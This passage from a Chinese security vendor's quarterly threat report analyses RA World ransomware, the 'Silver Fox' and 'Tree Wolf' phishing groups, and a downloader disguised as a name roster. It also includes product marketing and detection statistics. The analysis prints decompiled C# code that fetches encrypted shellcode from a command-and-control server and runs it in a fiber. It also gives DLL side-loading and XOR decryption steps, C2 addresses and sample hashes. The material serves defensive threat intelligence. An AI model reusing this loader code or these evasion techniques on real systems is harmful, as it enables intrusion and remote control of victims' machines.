勒索攻击团伙会使用不同的加密算法相结合,目的是增强加密安全性、提高加密效率和具有可移植性,可以在不同的操作系统和设备上使用。RA World勒索软件使用了curve25519和eSTREAM密码hc-128算法对文件进行加密,确保了加密过程的安全性,提升了加密文件的解密难度。另外,在加密策略上,勒索团伙可以根据文件类型选择加密方式,利用组合加密方式,快速的加密受害者文件。总的来说,随着勒索团伙不断演进和适应安全防护措施,他们除了在入侵方式上采取-15-了更加复杂和技术化的手段。在加密技术上也进行了深入探索,不断提升。了解这些变化对于企业和个人用户来说是至关重要的,可以帮助提升网络安全意识,加强安全防护措施,并更好地应对勒索攻击的威胁。勒索威胁治理勒索威胁治理方案方案 方舟,全面勒索治理解决方案,为用户构筑覆盖勒索治理“全链条”的安全体系 新一代终端安全TrustOne,围绕终端、专注终端,极简新的终端治理“专家级”方案 云安全DS,最全面、完整的云安全体系,全面覆盖云主机、云原生勒索治理 邮件防护DDEI,勒索防护与治理的基础能力,亚信安全实力优势体现 方舟全面治理勒索威胁方舟全面治理勒索威胁 亚信安全方舟勒索治理解决方案,是亚信安全基于勒索攻击最新研判,并聚焦用户APT治理的痛点需求,全面覆盖勒索攻击入侵、驻留、渗透、控制、外泄到实施的六大阶段,通过终端、云端、网络、边界、身份、数据检测与响应(目前引擎可洞察72个勒索攻击的检测点)的智能化技术联动,打通威胁数据、行为数据、资产数据、身份数据、网络数据等,形成了覆盖“事前、事中、事后”的勒索攻击全链条、全流程治理方案。DDEI将勒索遏制于萌芽将勒索遏制于萌芽 勒索家族通常使用高危定向社工钓鱼的方式进行攻击,对于此种入侵方式,我们建议在源头上进行阻断,亚信安全的信桅高级威胁邮件防护系统【DDEI】专用来检测和阻止定向工程邮件所导致的网络攻击及数据泄漏。它采用先进的恶意软件检测引擎,URL分析以及文件和Web沙箱技术,可快速识别并阻止或隔离这些定向工程邮件。让钓鱼邮件止步于DDEI。TrustOne开启勒索治理新升级开启勒索治理新升级 除了钓鱼邮件,漏洞利用也是勒索病毒经常使用的入侵手段,针对漏洞攻击,亚信安全新一代终端安全【TrustOne】能够 7*24 小时持续不间断识别各类已知资产、发现未知资产、互联网暴露面资产并识别这些资产各类脆弱性,包括漏洞、弱密码、开放端口、网络共享、互联网外联,并提供持续消除暴露面的各类措施,从而领先黑客消弭隐患。具备已知威胁和未知威胁和检测和响应能力、尤其是勒索、挖矿、无文件攻击、APT 攻击的检测和响应能力,从而缩短攻击发现和响应处置时间。攻击面管理攻击面管理-见于未萌,治于未乱见于未萌,治于未乱 从攻击者视角出发,持续不间断发现、评估组织类可被黑客利用的薄弱环节,并显性化、危险指数量化这些薄弱点;基于资产攻击面,通过安全评估模型以及漏洞修复动态优先级算法,建立漏洞修复的优先级,以及修复资源的合理安排,“SSVC CVSS 资产信息 威胁情报建议=修复优先级”,通过智能算法建立漏洞修复的优先级,在攻击发生前快速修复,从而帮助组织提升主动防御。-16-一体化治理一体化治理-建立有效治理体系建立有效治理体系 勒索治理要摆脱割裂的单点防御方式,在风险洞察、风险评估以及响应处置上实现高效联动,打破攻防不对称。基于TrustOne的升级加持,以AI智能引擎为核心,强化威胁情报能力,同时针对勒索团伙供给链的每个阶段、不同手段,在72个检测点进行主机行为、流量特征、威胁情报、文件等多维度防御部署,实时掌握已知与未知威胁的阻断,提升MTTD及MTTR。原子化能力原子化能力-轻量与高效同步进化轻量与高效同步进化 通过能力的原子化,TrustOne融合了防病毒、虚拟补丁、EDR、桌管、SDP、VP、网络准入等多项能力的同时,减小了资源占用和业务运行卡顿的问题,将一体化运维处置与勒索高效治理进行了有效融合与升级,也完成了新一代勒索治理的进阶式升级。信舱信舱DS以以“弱弱”制制强两招致胜强两招致胜 远程桌面(RDP)入侵也是勒索病毒经常采用的入侵方式,这种攻击方式对于那些使用弱密码或默认凭据的系统来说尤其危险,因为攻击者可以很容易地通过RDP暴力破解来获取访问权限。因此,弱口令的检查与管理其实是企业安全运营中最为关键、基础的环节,尤其是对于事前预防而言更是重要。做好弱口令扫描和安全基线的核查两大工作,可以及时发现账号口令的安全风险。目前,亚信安全信舱云主机安全等产品都具有弱口令扫描以及安全基线核查的功能模块。其中系统弱口令扫描功能,能够确保不会影响正常业务,快速高效的完成常态化弱口令检测。基线检查能力,能够按照要求对主机进行统一扫描,支持检测操作系统的账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置,并提供检测结果,针对存在的风险配置给出加固建议。-17-三、三、“银狐银狐”组织”组织利用财税钓鱼发动定向攻击利用财税钓鱼发动定向攻击 年初通常是财务工作人员最为忙碌的时期,不仅需要完成年度汇总和各种申报工作,同时也成为了网络攻击者的目标。特别是“银狐”组织,他们利用这一时机,专门针对财务人员发起钓鱼定向攻击。在这类攻击中,攻击者通过即时通信软件向目标用户发送伪装成正常程序或文件的链接,并诱导受害者点击和运行这些文件。一旦用户执行了这些看似无害的文件,攻击者就会利用受害者的电脑作为跳板,通过相同的即时通信软件继续向其他用户传播含有钓鱼木马的链接或文件。这种策略使得木马能够迅速扩散,从而影响更多的用户,扩大攻击的范围和影响。【群发送恶意文件】其常用的钓鱼文件名大多和税务相关,而文件格式则通常有EXE可执行程序、CHM文档、MSI安装包、VBS脚本等。如下是钓鱼文件常见文件名:关于办理个人专项附加扣除信息确认的通知-操作步骤说明 2024财会人员薪资补贴调整 稽查局企业稽查名单 为了规避安全软件的侦测,银狐组织不断更新其攻击手段。与之前直接在群内发送恶意可执行文件的方式不同,他们现在发送一个看似无害的Excel文件,以此降低用户的戒备心。用户在打开这个Excel文件后会看到其中包含一个链接。如果用户点击了这个链接,就会被引导到一个伪装的下载页面,这个页面会诱导用户下载一个远程控制木马。一旦安装,这种木马便能控制受害者的计算机并执行非法操作。-18-【“银狐”钓鱼文件执行流程】除了通过即时通信软件传播,“银狐”组织还通过钓鱼邮件传播,钓鱼邮件可以发送给更多的人群,扩大其攻击范围,使更多的人成为受害者。我们近期截获的针对财税岗位钓鱼邮件,其正文包含钓鱼链接,打开链接后,访问的是“银狐”组织精心设计的钓鱼网站,若在此钓鱼网站点击下载文件,实质上下载的是远控木马。【“银狐”钓鱼邮件样例】-19-【“银狐”钓鱼网站样例】不管通过哪种途径渗透受害者的设备,银狐组织的最终目的都是部署远程控制木马,以便控制受害者的电脑执行非法操作。他们持续升级攻击策略、部署手段以及恶意样本的传播方式,以应对安全软件的检测。此外,银狐木马还采用了多种免杀技术,比如使用合法程序进行伪装(白加黑)、对恶意载荷进行加密、以及直接在内存中加载,这些手法都是为了逃避安全软件的侦测。【银狐传播方式】-20-一季度,我们截获了使用MSI安装程序进行载荷投递实现免杀的“银狐”变种文件,其中,变种一是使用MSI安装程序释放GhostRAT。通过MSI释放多个组件,执行批处理文件(BAT),进一步运行可执行程序。其载荷在执行前经历了两次解密,这种多层解密技术可以有效地隐藏恶意代码的真实意图,使得静态分析更加困难。其最终在白样本的内存空间中执行GhostRAT恶意代码,有效逃避基于行为的检测机制。变种二则是基于系统环境释放和执行EXE文件。此变种首先判断受害系统是否安装了微信,然后释放EXE文件,EXE文件访问一个控制服务器的FTP地址,在内存解密payload,最终实现的远控功能允许攻击者从远程位置控制受感染的计算机,执行各种恶意活动。【MSI程序执行流程】如下是“银狐”MSI变种一的完整执行逻辑:受害者双击运行伪装成税务稽查名单的MSI文件,释放多个文件到C:WindowsHAHA 目录。执行样本后,启动多个进程,进程启动顺序:-21-Msiexec.exe/MSIBD5.TMP/cmd.exe/CNM.exe/erp.exe 其执行后释放多个组件到特定目录。具体组件及功能如下:文件名文件名 功能功能 释放来源释放来源 C:WindowsHAHAxo.had 加密的可执行文件 MSIEXEC.exe C:WindowsHAHAopk.txt 加密的可执行文件 MSIEXEC.exe C:WindowsHAHA1.txt CNM.exe的前半部分 MSIEXEC.exe C:WindowsHAHA2.txt CNM.exe的后半部分 MSIEXEC.exe C:WindowsHAHA3.jpg libcurl.dll的前半部分 MSIEXEC.exe C:WindowsHAHA4.jpg libcurl.dll的后半部分 MSIEXEC.exe C:WindowsHAHAlpo.bat 拼接1.txt/2.txt为CNM.exe,3.jpg/4.jpg为libcurl.dll,并运行CNM.exe。随后自删除 MSIEXEC.exe C:WindowsHAHAerp.exe 带数字签名的白EXE文件 加载导入函数curl_easy_init(libcurl.dll)MSIEXEC.exe C:WindowsHAHAmsvcp100.dll 带微软签名的DLL MSIEXEC.exe C:WindowsHAHAmsvcr100.dll 带微软签名的DLL MSIEXEC.exe C:WindowsHAHAlibcurl.dll 解密加载xo.had CMD.exe(lpo.bat)C:WindowsHAHACNM.exe 带虚假签名的恶意程序 解密加载opk.txt CMD.exe(lpo.bat)具体执行流程如下:1.受害者双击运行MSI文件,Windows调用MSIexec.exe安装上述程序,并释放多个文件到C:WindowsHAHA 2.MSIEXEC.exe调用cmd.exe运行lpo.bat;该脚本合并1.txt/2.txt 为CNM.exe,合并3.jpg/4.jpg为libcurl.dll,随后运行CNM.exe并自删除。【lpo.bat文件】3.CNM.exe读取opk.txt并对内容逐字节异或0 x6C,随后开辟空间执行。-22-4.内存中执行的代码,其主要功能为提权并执行erp.exe。5.erp.exe调用libcurl.dll的导出函数curl_easy_init。6.该函数读取xo.had文件,开辟空间并解密存放到内存段;随后调用CryptEnumOIDInfo API,将解密的恶意代码作为回调函数执行。-23-7.解密的恶意代码具有多个功能,如识别防病毒、键盘记录。【识别防病毒】【键盘记录】C2地址为206.238.199.99:49780(TCP)-24-银狐更新快、变种多,免杀技术不断提升,亚信安全专家团队会持续追踪银狐病毒,不断提高对银狐病毒的分析及检测能力。为了避免被银狐木马感染,相关用户应该保持警惕,并采取一些防护措施。以下是一些防护措施,以帮助相关用户避免被银狐木马感染:更新操作系统和应用程序。定期检查并安装操作系统和应用程序的更新,这些更新通常包含安全补丁,可以修复已知的安全漏洞。使用强密码和双重身份验证。设置复杂且难以猜测的密码,并启用双重身份验证(2FA)增加账户的安全性。警惕电子邮件附件和链接。不打开来自未知来源的电子邮件附件,不点击未经验证的链接。这些都是常见的感染途径。安全下载软件。只从官方网站或可信渠道下载软件,避免使用未经授权的第三方应用市场或链接。安装和定期更新安全软件。安装防病毒和反恶意软件程序,并确保它们保持最新状态,以便识别和阻止最新的威胁。小心即时通讯工具中的文件和链接。对即时通讯工具中接收的文件和链接保持警惕,特别是压缩包和未经请求的文件。培训和安全意识教育。对员工进行定期的安全培训,提高他们识别和应对网络钓鱼攻击、社会工程学以及其他网络威胁的能力。这些措施不仅能帮助用户保护自己不受银狐木马的影响,也对企业和组织的网络安全至关重要。通过积极防御和持续的安全教育,可以显著降低被感染的风险。-25-四、四、卷王卷王“银狐银狐”进化进化成成“树狼”“树狼”近日,亚信安全威胁团队狩猎发现了“银狐”变种“树狼”。“树狼”又名“雪狼”,于2023年首次被发现,其使用HFS搭建平台存储文件,且通常以微信投递钓鱼文件为主,假借“税务”、“稽查”等名义,同时还发现一些利用微信发送钓鱼链接,以及通过QQ、TG传递欺诈性文件的行为。此外,还有一些通过电子邮件投递以“律师函”为主题的钓鱼文件的情况。“树狼”和“雪狼”组织的样本行为及手法上与银狐具有极高的重合度。“树狼树狼”使用的使用的RAT 近期发现该组织使用过的远控木马有DCrat、farfli以及gh0st等。Dark Crystal RAT(DcRAT)是一款俄罗斯商业后门软件,首次亮相于2018年,经过一年的重新构建后再次发布。与那些专注于定制化恶意软件以攻击政府和企业目标的大型威胁组织不同,DcRAT似乎是个别黑客的独立创作,提供了一种经济实惠的后门工具,其价格明显低于市面上类似工具的标准价位。作为商业远程访问木马(RAT)中最实惠的之一,DcRAT主要在俄罗斯地下论坛上销售,近期的价格约为600卢布起(约合45元人民币),订阅期为两个月,特别促销期间价格甚至更为低廉。因此,在专业黑客和脚本小子团体中都备受追捧。武器库如下:后门后门 功能功能 Orcus RAT 激活摄像头和麦克风 DropboxAES RAT 远程访问木马 AgentTesla 收集用户终端上的隐私数据信息上传C&C服务器 Gh0st 大灰狼 AsyncRAT 截取屏幕 键盘记录 上传/下载/执行文件 持久化 禁用 Windows Defender 关机/重启 DOS 攻击 DcRAT 远程访问,后利用和信息泄露 Farfli 文件管理、键盘记录、远程桌面控制、系统管理、视频查看、语音监听、远程定位等远程操纵的高威胁功能 Androm 将被控机变为傀儡机 -26-时间线时间线 【时间线】钓鱼诱饵钓鱼诱饵 通过该组织使用“2024税务年度收支报表自动扣除项电脑版”、“关于2023年违法乱纪单位名单”、“责令限期整改公告名单”等作为钓鱼诱饵的压缩包文件,压缩包解压后有一个c 写的MFC程序,降低了查杀的可能性,该程序是下载器,用于后续后门下载。狩猎过程中关联到该组织使用HFS框架,部分使用pexpay82.icu作为C&C的样本payload使用gh0st。-27-老样本下载地址使用123pan的直连,直连特征为“域名/用户id/目录”,根据关联样本的时间线看该组织从去年10月就开始活动。存储样本的服务器站点如图所示(目前已无法打开),该组织喜欢使用香港IP作为服务器存放样本,香港服务器具有无需备案、速度与稳定性高,国内外都能访问、价格便宜等特点,深受黑灰产喜爱。-28-针对tg的木马:归因归因 雪狼组织命中银狐规则(body=*预览版&body=*文件)|(title=*文件下载);树狼命中了我们半个月前发现的“银狐Puppet”变种。以上家族都是使用hfs搭建文件存储服务,下载一个税务稽查、律师函之类比较敏感的文件,最后释放gh0st远控。钓鱼界面也比较类似,如下图所示:文件托管网站均为HFS搭建,如下图所示:-29-服务器大多部署在中国香港:结合以上特征,亚信安全威胁追踪团队判断树狼、雪狼、银狐同属于一个组织。-30-五五、恶意软件伪装成名单册进行攻击恶意软件伪装成名单册进行攻击 亚信安全威胁情报部门在日常狩猎过程中发现,近期有黑产团伙伪装成名单册对企业高层进行定向攻击,恶意软件下载页面如下:恶意软件下载网站(来源:亚信安全威胁情报中心)恶意软件详细分析恶意软件详细分析 样本下载链接:https:/tmp-titan.vx- 下载exe文件:802c928140a01ed991db3badfb3cb558f08ba4bde8963b5d3d6b98806c99d8cb 抓包初步探测:180.163.246.xx:443解析到,检测是否能出网,若不能出网则不进行下一步操作。网络行为(来源:亚信安全威胁情报中心)-31-对尝试网络连接:网络连接测试(来源:亚信安全威胁情报中心)从129.28.1xx.187:12345下载payload,如果多次没连上则执行自删除。动态调试会发现样本会开线程池,从线程池中取线程。猜测恶意行为是通过开启线程的方式加载起来的。开启线程池(来源:亚信安全威胁情报中心)验证猜测:main函数中部分关键代码块解读如下:Python/遍历c盘下的文件夹 string files=Directory.GetFiles(C:,*.);/创建一个线程列表用于存放线程名 -32-List list2=new List();/将获取到的文件夹名字存入数组array中 string array=files;/将c盘下的dll遍历并加载到内存中 foreach(string dllFile in array)Thread thread=new Thread(ThreadStart)delegate LoadDLLA(dllFile););list2.Add(thread);/起线程 thread.Start();foreach(Thread item2 in list2)/执行线程,并打印线程信息 item2.Join();Console.WriteLine(item2.ToString();Console.WriteLine(所有 DLL 文件已加载。);Process.GetCurrentProcess();AppDomain currentDomain=AppDomain.CurrentDomain;Console.WriteLine(正在加载的 DLL:);assemblies=currentDomain.GetAssemblies();上述代码主要完成以下工作:遍历c盘,起线程,加载dll。Python UnloadDLLs();Console.WriteLine(DLLs unloaded.);using(HttpClient client=new HttpClient()string requestUri=https:/ HttpResponseMessage obj=await client.GetAsync(requestUri);obj.EnsureSuccessStatusCode();Console.WriteLine(await obj.Content.ReadAsStringAsync();catch(Exception ex)Console.WriteLine(发生错误: ex.Message);Type typeFromHandle=typeof(ReflectExample);object obj2=Activator.CreateInstance(typeFromHandle);-33-MethodInfo method=typeFromHandle.GetMethod(SayHello);object array2=new object1 1;上述代码主要请求https:/ private static void Run()while(true)try /密钥 byte key=new byte16 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ;/盐 byte iv=new byte16 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ;/进行tcp连接 TcpClient tcpClient=new TcpClient(IP,port);/使用密钥和盐对收到的数据进行解密,解密后的数据存入数组array中 byte array=ReceiveFile(tcpClient,key,iv);tcpClient.Close();/shellcode解密 string string=Encoding.UTF8.GetString(Convert.FromBase64String(af2VyfbmVsfMzIufZGxs.Replace(f,);/获取导出函数ConvertThreadToFiber地址 (ConvertThreadToFiber)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,ConvertThreadToFiber),typeof(ConvertThreadToFiber)(IntPtr.Zero);/获取virtualalloc地址 IntPtr intPtr=(VirtualAlloc)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,VirtualAlloc),typeof(VirtualAlloc)(IntPtr.Zero,(UIntPtr)checked(ulong)array.Length),-34-AllocationType.MEM_COMMIT|AllocationType.MEM_RESERVE,64u);/将shellcode存入刚刚申请的内存空间中 Marshal.Copy(array,0,intPtr,array.Length);/创建纤程 IntPtr lpFiber=(CreateFiber)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,CreateFiber),typeof(CreateFiber)(0u,intPtr,IntPtr.Zero);/起纤程执行shellcode (SwitchToFiber)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,SwitchToFiber),typeof(SwitchToFiber)(lpFiber);finally Thread.Sleep(5000);上述代码主要从服务器端获取一段Shellcode,然后对Shellcode进行解密后创建纤程执行Shellcode。该cc已无响应,从测绘平台发现一段疑似Shellcode的响应,经解密后发现此Shellcode不完整。响应包(来源:亚信安全威胁情报中心)结合创建时间看,这两个样本疑似测试版本,样本回连地址为127.0.0.1,核心函数与上述样本基本一致:3691caa8a8d4f0d69f67c3d39426da01 86282b46b73c3c7b576261d98fb3f879 样本关联(来源:亚信安全威胁情报中心)-35-2024年年第第一一季度网络安全威胁治理季度网络安全威胁治理 一一、银狐治理方案银狐治理方案发布发布 “银狐”组织是一个活跃于东南亚的黑产团伙,他们采用产业化的方法进行分工和运营。这种方式涉及多个组织的协同工作,使得我们面临的挑战不仅仅是对抗单一的恶意程序,而是需要与一个完整的黑色产业链上的多个组织进行斗争。这种复杂的组织结构和协作方式大大增加了防御的难度,要求我们在策略和技术上都进行相应的调整和提升。亚信安全持续追踪“银狐”组织,依托于技术、人员和服务,针对“银狐”木马提出了事前风险排查,事中应急处置和事后安全加固的治理方案。【银狐治理总体措施】事前风险排查事前风险排查 面向企业,针对“银狐”木马,进行事前风险排查,通过DNS流量汇聚、DNS流量监测、定位风险终端、实现攻击溯源、清除“银狐”木马的“五步走”措施,检测、溯源并清除“银狐”木马,实现事前风险排查闭环。1.DNS流量汇聚流量汇聚,协助客户汇聚DNS流量,将相关分支机构的DNS流量指向至总部DNS服务器,同时确保总部DNS服务器安全,稳定和可靠。2.DNS流量监测流量监测,部署亚信AE设备,采用旁路部署的模式,将DNS流量镜像至AE设备,全面监测DNS流量中存在的勒索威胁。3.定位风险终端定位风险终端,通过MSS运营结合威胁情报,通过非法DNS查询,判别网络中是否存在”银狐“风险,一经发现,立即追踪溯源,定位风险终端。4.实现攻击溯源实现攻击溯源,在风险终端上部署EDR,检测、分析“银狐”在该终端的风险行为、时间、影响范围等,最终形成完整的溯源报告。-36-5.清除清除“银狐银狐”木马木马,通过EDR,针对风险终端上存在的“银狐”木马,进行响应处置,彻底清除“银狐”木马。事中应急处置事中应急处置 “银狐银狐”风险持续监测风险持续监测,部署AE/TDA/TrustOne等安全设备,持续监测DNS非法查询与终端异常外联行为,实时发现企业的“银狐”风险,并进行分析溯源。“银狐银狐”风险联动处置风险联动处置,针对“银狐”木马,形成联动处置能力,通过LinkOne等统一管理平台,结合AE/TDA/TrustOne等工具,针对“银狐”风险进行联动处置。【“银狐”木马产品联动处置】“银狐银狐”风险风险MSS服务服务,通过MSS运营,结合AE/TDA/TrustOne等工具,为企业提供“银狐”攻击检测溯源服务,可疑外连监测服务等。事后安全加固事后安全加固 事后安全加固目的是安全隐患清除,增强安全运营能力。极大程度修复高危勒索风险的漏洞、弱密码、关闭高危端口、清除”银狐”残留风险。现有的安全设备策略调优,安全设备最大化地发挥安全效果。安全运营能力补齐,根据当前安全现状补齐7*24H“银狐”防护能力。-37-【事后安全加固】产品与服务清单产品与服务清单 -38-二、二、攻防演练解决方案攻防演练解决方案3.03.0重磅发布重磅发布 自2016年起,国家攻防演习已开展八年,参与防守单位从起初2个壮大至23年近300个。攻防演练防守工作已成为各防守单位年度工作中的重中之重。但防守单位面临防护技术手段薄弱、经验少、技术人员不足等诸多挑战,因此采购第三方安全服务已成为各防守单位的第一选择,在攻防演练即将到来之际,亚信安全重磅发布攻防演练解决方案3.0。攻防演练利器攻防演练利器-外部攻击面管理服务迭代外部攻击面管理服务迭代 以攻击者视角评估企业暴露的外部攻击面,协助摸清家底、及时收敛外部风险资产、排查敏感数据泄密风险。攻防演练利器攻防演练利器-入侵与攻击模拟服务发布入侵与攻击模拟服务发布 从攻击者角度出发,模拟入侵攻击行为,验证现有安全防护体系的防护能力,包括钓鱼邮件、邮件网关、威胁情报、WAF、威胁防护、终端安全、数据保护等方面。攻防演练优势攻防演练优势 攻防演练攻击,连续获得国家攻防演练攻击队TOP10,在多个省、市级、行业级攻防演练中获得若干次第一名,包括江苏省攻防演练、广东省攻防演练、天津市攻防演练等演练活动。攻防演练防守,2023年国家级攻防演练活动中,通过高效的协同作战体系做到了近百防守项目0事故、100%客户0出局、95%客户0失分,入选公安部多篇优秀技战法的成绩;2022年在公安指挥部组织部分参演单位进行为期一天的无害化恶意程序攻防演练中,协助我们客户在演练中获得第一名,被评为无害化恶意程序防守典型单位;2021年配合国家信息中心制定全国电子政务外网攻防演练行动实践指南教材。-39-业内第一家将外部攻击面管理服务融入到攻防演练/重保/勒索治理解决方案的厂商;亚信外部攻击面管理平台入选安全牛攻击面管理技术应用指南十大代表性厂商。-40-三、三、勒索攻击演练服务重磅发布勒索攻击演练服务重磅发布 亚信安全通过分析历年勒索攻击事件,提取不同勒索团伙在勒索各阶段常用的攻击手段,孵化出一系列勒索攻击场景,通过模拟勒索攻击的方式,可在初始入侵阶段、横向移动、权限提升、权限维持、数据外泄、执行勒索等攻击阶段,开展勒索攻击演练,以此验证客户针对于勒索攻击不同阶段的防御能力。初始入侵阶段:初始入侵阶段:该阶段是整个勒索攻击过程的基础,可通过模拟社交钓鱼、邮件钓鱼、漏洞利用等手段,获取内网非授权主机的访问权限。横向移动阶段:横向移动阶段:通过演练网络服务扫描、嗅探,收集主机、身份、凭证等信息,攻击集权系统等方式,进一步扩大控制范围和获取更多敏感信息。权限提升阶段:权限提升阶段:演练利用提取漏洞、进程注入、BypassUAC等手段,提升权限级别。权限维持阶段:权限维持阶段:演练通过添加计划任务、启动项,白利用、DLL劫持等手段,确保长期保持对系统的控制权。数据外泄阶段:数据外泄阶段:演练通过C2通道、WEB服务、公有云存储、远程桌面应用程序等方式,进行数据外泄。执行勒索阶段:执行勒索阶段:利用亚信自主开发的软件,下载部署并执行勒索软件等操作。-41-勒索演练优势勒索演练优势 专业攻防能力专业攻防能力:连续获得国家攻防演练攻击队TOP10,在多个省、市级、行业级攻防演练中获得若干次第一名。多年经验积累多年经验积累:国家级SL扫雷行动核心支撑厂商、国家级应急支撑单位、国家级病毒实验室、30年病毒数据样本积累、专业级应急响应中心(每年处理数万案件)。勒索家族追踪勒索家族追踪:持续跟踪近千家勒索家族,日均捕获样本过百万。专业安服团队专业安服团队:完备的整体解决方案,团队覆盖31个省及直辖市,四级梯队全天候响应,累计处置勒索事件过万起。-42-2024年年第第一一季季度度网络网络安全安全数据数据分析分析 一、病毒拦截信息统计病毒拦截信息统计(一)(一)病毒拦截次数排名 2024年一季度,亚信安全拦截Trojan.Win32.FRS.VSNW0CJ23病毒的次数达到19万次,排名第一位。其次是Trojan.VBS.EMOTET.SMAJC和TROJ_FRS.VSNTH323。木马是一种非常常见的恶意软件类型。它得名于古希腊的特洛伊木马故事,因其擅长伪装和欺骗的特性而命名。木马程序通常伪装成合法的软件或文件,诱使用户下载和安装。一旦激活,它可以执行各种恶意活动,如窃取敏感信息、下载其他恶意软件、控制受感染的机器,或者作为后门功能,允许攻击者远程访问受感染的系统。在我们的日常工作和生活中,采取以下几个关键步骤至关重要:首先,定期更新操作系统和所有已安装的软件,确保应用所有的安全补丁,以此减少攻击者利用已知漏洞的机会。其次,对于电子邮件中的链接和附件,应保持警惕,避免随意点击或下载来历不明的文件,因为钓鱼邮件是传播木马的常见手段。此外,安装并持续更新优质的杀毒软件和防火墙,这些安全工具能有效识别和阻止木马及其他恶意软件。通过实施这些措施,我们可以显著降低木马病毒的感染风险,并增强对潜在网络安全威胁的防御能力。【2024年第1季度病毒拦截次数排名】1980271314896314756504407443554934803324423212229030050000100000150000200000250000病毒拦截数量病毒拦截数量TOP 10-43-二、二、勒索勒索软件软件信息信息统计统计 (一)勒索软件攻击数量统计 2024年第一季度,亚信安全拦截勒索软件攻击共计12,603次,与上一季度相比,拦截数量有所下降。这些攻击旨在通过加密个人用户、企业组织和公共机构的数据来勒索赎金。我们通过及时更新和优化安全防护措施来抵御日益复杂和变化的勒索病毒攻击。此外,用户和组织对于网络安全意识的提升也起到一定的积极作用,他们更加重视数据备份、讲究网络安全基础措施,以及警惕可疑的电子邮件或链接。【2023年4月-2024年3月拦截勒索软件攻击数量】由于勒索病毒攻击是一种持续威胁,因此,需要我们持续关注和应对。随着技术的不断发展,黑客不断改进攻击手段,采取更加隐蔽和复杂的方式进行勒索病毒攻击。因此,亚信安全将继续加强病毒库的更新,实时监测和分析网络流量,积极参与威胁情报共享,以更好地保护用户和企业的数据安全。5546501444334623686646657068679243754765402838102000300040005000600070008000勒索软件攻击数量勒索软件攻击数量-44-(二)勒索软件拦截TOP 10 2024年第一季度勒索家族TOP 10中,RANSOM_WCRY病毒居首位,其检测量高达33%,其次是RANSOM_CERBER和RANSOM_LOCKY。其中,Locky勒索病毒主要以钓鱼邮件和恶意URL的形式进行传播。黑客向受害者邮箱发送带有恶意Word文档的电子邮件,Word文档中包含有黑客精心构造的恶意宏代码。一旦受害者打开文档并运行宏代码后,主机会主动连接指定的Web服务器,下载并强制执行Locky恶意软件,主动连接C&C服务器,执行上传本机信息,下载加密公钥。Locky遍历本地所有磁盘和文件夹,找到特定后缀的文件,将其加密成后缀为.locky的文件。【2024年第1季度勒索家族拦截TOP 10】RANSOM_WCRY33%RANSOM_CERBER16%RANSOM_LOCKY13%RANSOM_GANDCRAB11%TROJ_CRYPWALL7%RANSOM_BLOCKER5%RANSOM_BLACKSUIT4%RANSOM_FILECODER4%RANSOM_SPORA4%RANSOM_CRYPHYDRA3%勒索家族拦截勒索家族拦截 TOP 10-45-三、挖矿病毒信息统计三、挖矿病毒信息统计 (一)挖矿病毒拦截数量统计 2024年第一季度,亚信安全拦截挖矿病毒共计3,318次,拦截数量比上一季度有所下降。从月检测图来看,本季度的挖矿病毒检测数量呈递减趋势。【2023年4月-2024年3月挖矿病毒拦截数量统计】20132516221820022089184422281492137813071038973040080012001600200024002800挖矿病毒检测情况-46-(二)挖矿病毒家族TOP 10 2024年第一季度挖矿病毒家族TOP 10中,WORM_COINMINER家族居首位,其检测量高达49%,其次是COINMINER_MALXMR家族和TROJ_COINMINE家族。其中,WORM_COINMINER通过共享网络传播,释放并执行挖矿程序。【2024年第1季度挖矿病毒家族TOP 10】-47-四四、漏洞攻击拦截统计漏洞攻击拦截统计 (一)已知漏洞拦截TOP 10 在网络安全领域,大多数漏洞利用病毒都是通过利用已知漏洞对系统进行攻击。这种攻击通常是由有经验的黑客或恶意攻击者利用已公开的、尚未修补的漏洞,通过特定的代码或恶意脚本来利用受影响的软件或系统漏洞。黑客将这些漏洞作为入口,试图获取非法权限、敏感数据,或者在目标系统上执行恶意操作。【已知漏洞拦截TOP 10】为了防止这样的攻击,及时修补已知漏洞是至关重要的。软件开发者和供应商通常会发布安全补丁或更新,以修复这些漏洞。因此,保持软件和系统的更新,及时修补已知漏洞,加强网络安全防护,是减少漏洞利用病毒攻击风险的重要措施。此外,网络用户也应加强安全意识,避免点击可疑链接、下载未经验证的文件,以及定期备份和加密重要数据,以避免成为漏洞利用病毒攻击的受害者。52252267667680992428857471951244037110100100010000100000APSA15-01APSB15-03CVE-2014-4148CVE-2014-4113CVE-2014-6271CVE-2010-2729CVE-2012-0158CVE-2013-3906CVE-2010-2568CVE-2008-4250已知漏洞拦截已知漏洞拦截TOP 10-48-关于亚信安全关于亚信安全 亚信安全是中国网络安全软件领域的领跑者,是业内“懂网、懂云”的网络安全公司。承继亚信30年互联网建设经验,肩负守护互联网之使命,亚信安全于2015年正式启航,目前已成为建设中国网络安全的重要力量。不负使命,成功执行建党100周年、历年两会等国家重要网络安全保障任务30余次。依托互联网建设能力,让亚信安全具备强大的“懂网”业务能力与资源优势;深耕网络安全高精技术,让亚信安全拥有优异的“懂云”技术基因。亚信安全在云安全、身份安全、终端安全、安全管理、高级威胁治理及5G安全等领域突破核心技术,用实力筑牢云、网、边、端之安全防线。亚信安全在中国网络安全电信行业细分市场份额占比第一,连续五年蝉联身份安全中国市场份额第一,终端安全中国市场份额占比第二,在威胁情报、EDR、XDR等细分技术领域均居于领导者象限,是中国网络安全企业10强。秉承建网基因,坚守护网之责,亚信安全以护航产业互联为使命,以安全数字世界为愿景。2020年提出“安全定义边界”的发展理念,以身份安全为基础,以云网安全和端点安全为重心,以安全中台为枢纽,以威胁情报为支撑,构建“云化、联动、智能”的技术战略,守护亿万家庭和关键信息网络,建设全网安全免疫系统,为我国从网络大国向网络强国迈进保驾护航。更多关于亚信安全公司及最新产品信息,请访问:http:/www.asiainfo- 更多安全资讯请您关注亚信安全官方微信:

    浏览量39人已浏览 发布时间2024-05-10 48页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 飞驰云联:2024研发数据安全传输管控实践精华白皮书(23页).pdf

